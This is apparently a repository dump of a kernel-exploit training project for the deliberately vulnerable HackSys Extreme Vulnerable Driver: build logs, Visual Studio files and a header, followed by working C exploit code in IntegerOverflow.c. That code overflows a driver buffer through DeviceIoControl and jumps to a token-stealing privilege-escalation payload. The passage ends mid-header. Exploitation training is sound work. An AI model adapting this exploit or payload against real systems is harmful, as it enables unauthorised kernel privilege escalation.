https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/CL.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/CL.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/Common.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/Common.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.exe
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.ilk
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.lastbuildstate:
--------------------------------------------------------------------------------
1 | #v4.0:v100
2 | Debug|Win32|C:\HackSysExtremeVulnerableDriver\Exploit\Source\|
3 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.log:
--------------------------------------------------------------------------------
1 | Build started 1/22/2017 11:36:08 AM.
2 | Project "C:\HackSysExtremeVulnerableDriver\Exploit\Source\HackSysEVDExploit.vcxproj" on node 2 (build target(s)).
3 | InitializeBuildStatus:
4 | Creating "Debug\HackSysEVDExploit.unsuccessfulbuild" because "AlwaysCreate" was specified.
5 | ClCompile:
6 | C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin\CL.exe /c /ZI /nologo /W3 /WX- /Od /Oy- /D _MBCS /Gm /EHsc /RTC1 /MDd /GS /fp:precise /Zc:wchar_t /Zc:forScope /Fo"Debug\\" /Fd"Debug\vc100.pdb" /Gd /TC /analyze- /errorReport:prompt ArbitraryOverwrite.c Common.c HackSysEVDExploit.c IntegerOverflow.c NullPointerDereference.c PoolOverflow.c Payloads.c StackOverflow.c StackOverflowGS.c TypeConfusion.c UninitializedHeapVariable.c UninitializedStackVariable.c UseAfterFree.c
7 | UseAfterFree.c
8 | UninitializedStackVariable.c
9 | UninitializedHeapVariable.c
10 | TypeConfusion.c
11 | StackOverflowGS.c
12 | StackOverflow.c
13 | Payloads.c
14 | PoolOverflow.c
15 | NullPointerDereference.c
16 | IntegerOverflow.c
17 | HackSysEVDExploit.c
18 | Common.c
19 | ArbitraryOverwrite.c
20 | Generating Code...
21 | Link:
22 | C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin\link.exe /ERRORREPORT:PROMPT /OUT:"C:\HackSysExtremeVulnerableDriver\Exploit\Source\Debug\HackSysEVDExploit.exe" /NOLOGO kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /MANIFEST /ManifestFile:"Debug\HackSysEVDExploit.exe.intermediate.manifest" /MANIFESTUAC:"level='asInvoker' uiAccess='false'" /DEBUG /PDB:"C:\HackSysExtremeVulnerableDriver\Exploit\Source\Debug\HackSysEVDExploit.pdb" /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:"C:\HackSysExtremeVulnerableDriver\Exploit\Source\Debug\HackSysEVDExploit.lib" /MACHINE:X86 Debug\ArbitraryOverwrite.obj
23 | Debug\Common.obj
24 | Debug\HackSysEVDExploit.obj
25 | Debug\IntegerOverflow.obj
26 | Debug\NullPointerDereference.obj
27 | Debug\PoolOverflow.obj
28 | Debug\Payloads.obj
29 | Debug\StackOverflow.obj
30 | Debug\StackOverflowGS.obj
31 | Debug\TypeConfusion.obj
32 | Debug\UninitializedHeapVariable.obj
33 | Debug\UninitializedStackVariable.obj
34 | Debug\UseAfterFree.obj
35 | HackSysEVDExploit.vcxproj -> C:\HackSysExtremeVulnerableDriver\Exploit\Source\Debug\HackSysEVDExploit.exe
36 | Manifest:
37 | C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\bin\mt.exe /nologo /verbose /outputresource:"C:\HackSysExtremeVulnerableDriver\Exploit\Source\Debug\HackSysEVDExploit.exe;#1" /manifest Debug\HackSysEVDExploit.exe.intermediate.manifest
38 | FinalizeBuildStatus:
39 | Deleting file "Debug\HackSysEVDExploit.unsuccessfulbuild".
40 | Touching "Debug\HackSysEVDExploit.lastbuildstate".
41 | Done Building Project "C:\HackSysExtremeVulnerableDriver\Exploit\Source\HackSysEVDExploit.vcxproj" (build target(s)).
42 |
43 | Build succeeded.
44 |
45 | Time Elapsed 00:00:03.15
46 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.pdb
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.vcxprojResolveAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.vcxprojResolveAssemblyReference.cache
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/HackSysEVDExploit.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/IntegerOverflow.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/IntegerOverflow.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/NullPointerDereference.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/NullPointerDereference.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/Payloads.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/Payloads.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/PoolOverflow.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/PoolOverflow.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/StackOverflow.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/StackOverflow.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/StackOverflowGS.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/StackOverflowGS.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/TypeConfusion.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/TypeConfusion.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/UninitializedHeapVariable.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/UninitializedHeapVariable.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/UninitializedStackVariable.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/UninitializedStackVariable.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/UseAfterFree.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/UseAfterFree.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/cl.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/cl.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/link.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/link.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/link.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/mt.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/mt.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/mt.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/mt.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/mt.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/mt.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/vc100.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/vc100.idb
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/vc100.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/vc100.pdb
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/HackSysEVDExploit.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | HackSysEVDExploit.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | main exploit module handling the exploitation routines.
47 |
48 | --*/
49 |
50 | #ifndef __EXPLOIT_H__
51 | #define __EXPLOIT_H__
52 |
53 | #pragma once
54 |
55 | #include "arg.h"
56 | #include "Common.h"
57 |
58 | typedef enum _VULNERABILITY_TYPE {
59 | PoolOverflow,
60 | UseAfterFree,
61 | TypeConfusion,
62 | StackOverflow,
63 | IntegerOverflow,
64 | StackOverflowGS,
65 | ArbitraryOverwrite,
66 | NullPointerDereference,
67 | UninitializedHeapVariable,
68 | UninitializedStackVariable
69 | } VULNERABILITY_TYPE, *PVULNERABILITY_TYPE;
70 |
71 | typedef struct _EXPLOIT_VULNERABILITY {
72 | PTCHAR Command;
73 | VULNERABILITY_TYPE VulnerabilityType;
74 | } EXPLOIT_VULNERABILITY, *PEXPLOIT_VULNERABILITY;
75 |
76 | static VOID ShowUsage(PTCHAR Process);
77 | BOOL IsProcessHavingHigherPrivilege(LPCSTR TargetProcess);
78 | VOID Exploit(PEXPLOIT_VULNERABILITY ExploitVulnerability);
79 | VOID LaunchExploitThread(LPTHREAD_START_ROUTINE ExploitHandlerThread);
80 |
81 | #endif //__EXPLOIT_H__
82 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/HackSysEVDExploit.sdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/HackSysEVDExploit.sdf
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/HackSysEVDExploit.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 11.00
3 | # Visual Studio 2010
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HackSysEVDExploit", "HackSysEVDExploit.vcxproj", "{A432D8CD-BCEA-49B5-81EE-20B926D7421A}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}.Debug|Win32.Build.0 = Debug|Win32
14 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}.Release|Win32.ActiveCfg = Release|Win32
15 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/HackSysEVDExploit.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/HackSysEVDExploit.suo
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/HackSysEVDExploit.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 |
14 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}
15 | HackSysEVDExploit
16 | HackSysEVDExploit
17 |
18 |
19 |
20 | Application
21 | true
22 | MultiByte
23 |
24 |
25 | Application
26 | false
27 | true
28 | MultiByte
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 | Level3
44 | Disabled
45 |
46 |
47 | true
48 |
49 |
50 |
51 |
52 | Level3
53 | MaxSpeed
54 | true
55 | true
56 |
57 |
58 | true
59 | true
60 | true
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/HackSysEVDExploit.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 | Source Files
26 |
27 |
28 | Source Files
29 |
30 |
31 | Source Files
32 |
33 |
34 | Source Files
35 |
36 |
37 | Source Files
38 |
39 |
40 | Source Files
41 |
42 |
43 | Source Files
44 |
45 |
46 | Source Files
47 |
48 |
49 | Source Files
50 |
51 |
52 | Source Files
53 |
54 |
55 | Source Files
56 |
57 |
58 |
59 |
60 | Header Files
61 |
62 |
63 | Header Files
64 |
65 |
66 | Header Files
67 |
68 |
69 | Header Files
70 |
71 |
72 | Header Files
73 |
74 |
75 | Header Files
76 |
77 |
78 | Header Files
79 |
80 |
81 | Header Files
82 |
83 |
84 | Header Files
85 |
86 |
87 | Header Files
88 |
89 |
90 | Header Files
91 |
92 |
93 | Header Files
94 |
95 |
96 | Header Files
97 |
98 |
99 | Header Files
100 |
101 |
102 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/HackSysEVDExploit.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/IntegerOverflow.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | IntegerOverflow.c
43 |
44 | Abstract:
45 | This module implements the exploit for Integer Overflow
46 | Vulnerability implemented in HackSys Extreme Vulnerable
47 | Driver.
48 |
49 | --*/
50 |
51 | #include "IntegerOverflow.h"
52 |
53 | DWORD WINAPI IntegerOverflowThread(LPVOID Parameter) {
54 | HANDLE hFile = NULL;
55 | ULONG BytesReturned;
56 | PVOID MemoryAddress = NULL;
57 | PULONG UserModeBuffer = NULL;
58 | LPCSTR FileName = (LPCSTR)DEVICE_NAME;
59 | PVOID EopPayload = &TokenStealingPayloadWin7;
60 | SIZE_T UserModeBufferSize = (BUFFER_SIZE + RET_OVERWRITE_INTEGER + BUFFER_TERMINATOR) * sizeof(ULONG);
61 |
62 | __try {
63 | DEBUG_MESSAGE("\t[+] Setting Thread Priority\n");
64 |
65 | if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {
66 | DEBUG_ERROR("\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n");
67 | }
68 | else {
69 | DEBUG_INFO("\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n");
70 | }
71 |
72 | // Get the device handle
73 | DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
74 | DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);
75 |
76 | hFile = GetDeviceHandle(FileName);
77 |
78 | if (hFile == INVALID_HANDLE_VALUE) {
79 | DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
80 | exit(EXIT_FAILURE);
81 | }
82 | else {
83 | DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
84 | }
85 |
86 | DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");
87 |
88 | DEBUG_INFO("\t\t[+] Allocating Memory For Buffer\n");
89 |
90 | // Allocate the Heap chunk
91 | UserModeBuffer = (PULONG)HeapAlloc(GetProcessHeap(),
92 | HEAP_ZERO_MEMORY,
93 | UserModeBufferSize);
94 |
95 | if (!UserModeBuffer) {
96 | DEBUG_ERROR("\t\t\t[-] Failed To Allocate Memory: 0x%X\n", GetLastError());
97 | exit(EXIT_FAILURE);
98 | }
99 | else {
100 | DEBUG_INFO("\t\t\t[+] Memory Allocated: 0x%p\n", UserModeBuffer);
101 | DEBUG_INFO("\t\t\t[+] Allocation Size: 0x%X\n", UserModeBufferSize);
102 | }
103 |
104 | DEBUG_INFO("\t\t[+] Preparing Buffer Memory Layout\n");
105 |
106 | RtlFillMemory((PVOID)UserModeBuffer, UserModeBufferSize, 0x41);
107 |
108 | MemoryAddress = (PVOID)(((ULONG)UserModeBuffer + UserModeBufferSize) - (sizeof(ULONG) * 2));
109 | *(PULONG)MemoryAddress = (ULONG)EopPayload;
110 |
111 | DEBUG_INFO("\t\t\t[+] RET Value: 0x%p\n", *(PULONG)MemoryAddress);
112 | DEBUG_INFO("\t\t\t[+] RET Address: 0x%p\n", MemoryAddress);
113 |
114 | MemoryAddress = (PVOID)((ULONG)MemoryAddress + sizeof(ULONG));
115 | *(PULONG)MemoryAddress = (ULONG)0xBAD0B0B0;
116 |
117 | DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);
118 |
119 | DEBUG_MESSAGE("\t[+] Triggering Integer Overflow\n");
120 |
121 | OutputDebugString("****************Kernel Mode****************\n");
122 |
123 | DeviceIoControl(hFile,
124 | HACKSYS_EVD_IOCTL_INTEGER_OVERFLOW,
125 | (LPVOID)UserModeBuffer,
126 | (DWORD)0xFFFFFFFF,
127 | NULL,
128 | 0,
129 | &BytesReturned,
130 | NULL);
131 |
132 | OutputDebugString("****************Kernel Mode****************\n");
133 |
134 | HeapFree(GetProcessHeap(), 0, (LPVOID)UserModeBuffer);
135 |
136 | UserModeBuffer = NULL;
137 | }
138 | __except (EXCEPTION_EXECUTE_HANDLER) {
139 | DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetLastError());
140 | exit(EXIT_FAILURE);
141 | }
142 |
143 | return EXIT_SUCCESS;
144 | }
145 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/IntegerOverflow.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
